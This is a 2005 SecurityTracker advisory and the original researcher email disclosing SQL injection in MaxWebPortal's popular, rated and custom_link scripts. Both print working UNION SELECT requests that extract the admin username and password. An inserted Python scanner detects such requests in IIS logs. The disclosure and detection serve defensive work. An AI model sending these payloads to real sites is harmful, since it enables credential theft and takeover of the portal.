SecurityTracker.com

Category:   Application (Forum/Board/Portal)  >   MaxWebPortal
Vendors:   Yuan, Max
MaxWebPortal Has Input Validation Holes in Multiple Scripts That Permit SQL Injection and Grant Remote Administrative Access
SecurityTracker Alert ID:  1013845
SecurityTracker URL:  http://securitytracker.com/id/1013845
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Apr 29 2005
Impact:   Disclosure of authentication information, Disclosure of system information, Disclosure of user information, User access via network
Exploit Included:  Yes  

Description:   Soroush Dalili from Grayhatz security group reported a vulnerability in MaxWebPortal. A remote user can inject SQL commands to gain administrative access.

Several scripts do not properly validate user-supplied input. As a result, a remote user can supply specially crafted parameter values to execute SQL commands on the underlying database.

The following scripts are affected:

article_popular.asp
dl_popular.asp
links_popular.asp
pic_popular.asp
article_rate.asp
dl_rate.asp
links_rate.asp
pic_rates.asp
article_toprated.asp
dl_toprated.asp
links_toprated.asp
pic_toprated.asp

Some demonstration exploit requests are provided:

Dl_Popular.asp?40 DL_ID,Hit,DESCRIPTION,NAME,POST_DATE,1,1,1,1,1,1,1 FROM DL union select
m_username,m_password,1,1,1,1,1,1,1,1,1,1 from PORTAL_MEMBERS where
m_username='admin' union select

Links_Popular.asp?10
LINK_ID,Hit,DESCRIPTION,NAME,POST_DATE,banner_url,1,1,1,1,1,1,1 FROM LINKS
union select m_username,m_password,1,1,1,1,1,1,1,1,1,1,1 from PORTAL_MEMBERS
where m_username='admin' union select

pics_popular.asp?10 LINK_ID, HIT,NAME, URL, KEYWORD, DESCRIPTION, EMAIL, POST_DATE,
BANNER_URL, CATEGORY, PARENT_ID, SHOW, BADLINK FROM pic union select
m_username,m_password,1,1,1,1,1,1,1 from PORTAL_MEMBERS where
m_username='admin' union select

dl_toprated.asp?10 RATING,Votes,DESCRIPTION,NAME,POST_DATE,1,1,1,1,1,1,1 FROM DL union select
m_username,m_password,1,1,1,1,1,1,1,1,1,1 from PORTAL_MEMBERS where
m_username='admin' union select

custom_link.asp?method=Topic&TOPIC_ID=[Sql inject]

custom_link.asp?method=Forum&Forum_ID=[Sql inject]

Impact:   A remote user can execute SQL commands on the underlying database. This can be exploited to retrieve passwords and gain administrative access to the application.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.maxwebportal.com/
Cause:   Input validation error
Underlying OS:  Windows (Any)
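
A log check for the requests described above, as an added example that is not part of this SecurityTracker entry or of MaxWebPortal's code: it scans IIS W3C-format log lines for requests to the affected scripts whose query string is not the plain number that the `?40` / `?10` prefixes in the reported requests suggest. The sample log lines, the `/portal/` path, and the assumption that legitimate values are bare integers are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote_plus

# Assumption: the *_popular / *_toprated pages legitimately receive only a
# bare row count as the whole query string (the "?40" / "?10" in the advisory).
COUNT_ONLY = re.compile(r"^(article|dl|links|pics?)_(popular|toprated)\.asp$")
# The page gives no parameter format for the rate scripts: keyword check only.
RATE = re.compile(r"^((article|dl|links)_rate|pic_rates)\.asp$")
SQL_WORDS = re.compile(r"\b(union|select)\b|'", re.I)
DIGITS = re.compile(r"[0-9]+")
NUMERIC_IDS = {"topic_id", "forum_id"}  # custom_link.asp parameters

# Constructed sample log (not real traffic); 192.0.2.0/24 is documentation space.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2005-04-29 10:00:01 192.0.2.10 GET /portal/dl_popular.asp 40 200
2005-04-29 10:00:05 192.0.2.77 GET /portal/dl_popular.asp 40+DL_ID,Hit+FROM+DL+union+select 200
2005-04-29 10:00:09 192.0.2.77 GET /portal/custom_link.asp method=Topic&TOPIC_ID=7+union+select 200
2005-04-29 10:00:12 192.0.2.10 GET /portal/custom_link.asp method=Forum&Forum_ID=3 200
"""

def classify(uri_stem, uri_query):
    """Return a reason string if the request breaks the expected format, else None."""
    script = uri_stem.rsplit("/", 1)[-1].lower()
    raw = "" if uri_query == "-" else uri_query  # IIS logs "-" for no query
    if COUNT_ONLY.match(script):
        if raw and not DIGITS.fullmatch(unquote_plus(raw)):
            return "non-numeric count"
    elif RATE.match(script):
        if SQL_WORDS.search(unquote_plus(raw)):
            return "sql keyword"
    elif script == "custom_link.asp":
        for key, value in parse_qsl(raw, keep_blank_values=True):
            if key.lower() in NUMERIC_IDS and not DIGITS.fullmatch(value):
                return "non-numeric " + key
    return None

def scan(log_text):
    """Return (client_ip, uri_stem, reason) for each suspicious log line."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            row = dict(zip(fields, line.split()))
            reason = classify(row.get("cs-uri-stem", ""), row.get("cs-uri-query", "-"))
            if reason:
                hits.append((row.get("c-ip"), row.get("cs-uri-stem"), reason))
    return hits
```

The same digits-only rule, applied in the scripts before the value reaches the SQL string, is the input validation whose absence the entry lists as the cause.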

Message History:   None.


 Source Message Contents

Subject:  Critical bug in Maxwebportal (Critical sql injections)


Hi, I'm Soroush Dalili, from Grayhatz security group (grayhatz.com). I found 
some bugs in MaxWebPortal. This 
works in all versions till now!
-----------------------------
Description: A remote user can find other users' passwords through some SQL 
injections and so can gain admin of the portal!
What's that? -> MaxWebPortal is a good and free ASP portal that is used in many 
sites (also in my old site!)
Bugz:
A remote user can gain other users' passwords through some SQL injections in:
article_popular.asp
dl_popular.asp
links_popular.asp
pic_popular.asp
article_rate.asp
dl_rate.asp
links_rate.asp
pic_rates.asp
article_toprated.asp
dl_toprated.asp
links_toprated.asp
pic_toprated.asp
------------------------------------------------------------------------------------------------------------
Proof:
Some Exploits:
Get Username=Admin password: (if I didn't write some of them, you can make 
them easily by yourself!)
----------------
Dl_Popular.asp?40 DL_ID,Hit,DESCRIPTION,NAME,POST_DATE,1,1,1,1,1,1,1 FROM DL 
union select 
m_username,m_password,1,1,1,1,1,1,1,1,1,1 from PORTAL_MEMBERS where 
m_username='admin' union 
select
---------------
Links_Popular.asp?10 
LINK_ID,Hit,DESCRIPTION,NAME,POST_DATE,banner_url,1,1,1,1,1,1,1 FROM LINKS 
union select m_username,m_password,1,1,1,1,1,1,1,1,1,1,1 from PORTAL_MEMBERS 
where 
m_username='admin' union select
--------------
pics_popular.asp?10 LINK_ID, HIT,NAME, URL, KEYWORD, DESCRIPTION, EMAIL, 
POST_DATE, 
BANNER_URL, CATEGORY, PARENT_ID, SHOW, BADLINK FROM pic union select 
m_username,m_password,1,1,1,1,1,1,1 from PORTAL_MEMBERS where 
m_username='admin' union select
-------------
dl_toprated.asp?10 RATING,Votes,DESCRIPTION,NAME,POST_DATE,1,1,1,1,1,1,1 
FROM DL union select 
m_username,m_password,1,1,1,1,1,1,1,1,1,1 from PORTAL_MEMBERS where 
m_username='admin' union 
select
------------
You can make it in other pages too!
-----------------------------------------------------------------------------------------------------------------
Some other SQL injections are:
custom_link.asp?method=Topic&TOPIC_ID=[Sql inject] 
custom_link.asp?method=Forum&Forum_ID=[Sql inject] 

-----------------------------------------------------------------------------------------------------------------
Vendor URL:  Http://www.maxwebportal.info , http://www.maxwebportal.com
Solution: Some patches are available at www.maxwebportal.info
Cause: SQL injection
Version: all versions before 2005/4/27 (maxwebportal 2.x, 1.35 , ... )
Fix Available:  Some of them are available
Finder: Soroush Dalili ( Grayhatz security group )
Email: Irsdl@yahoo.com , S-dalili@sbu.ac.ir
Country: Iran
 
 

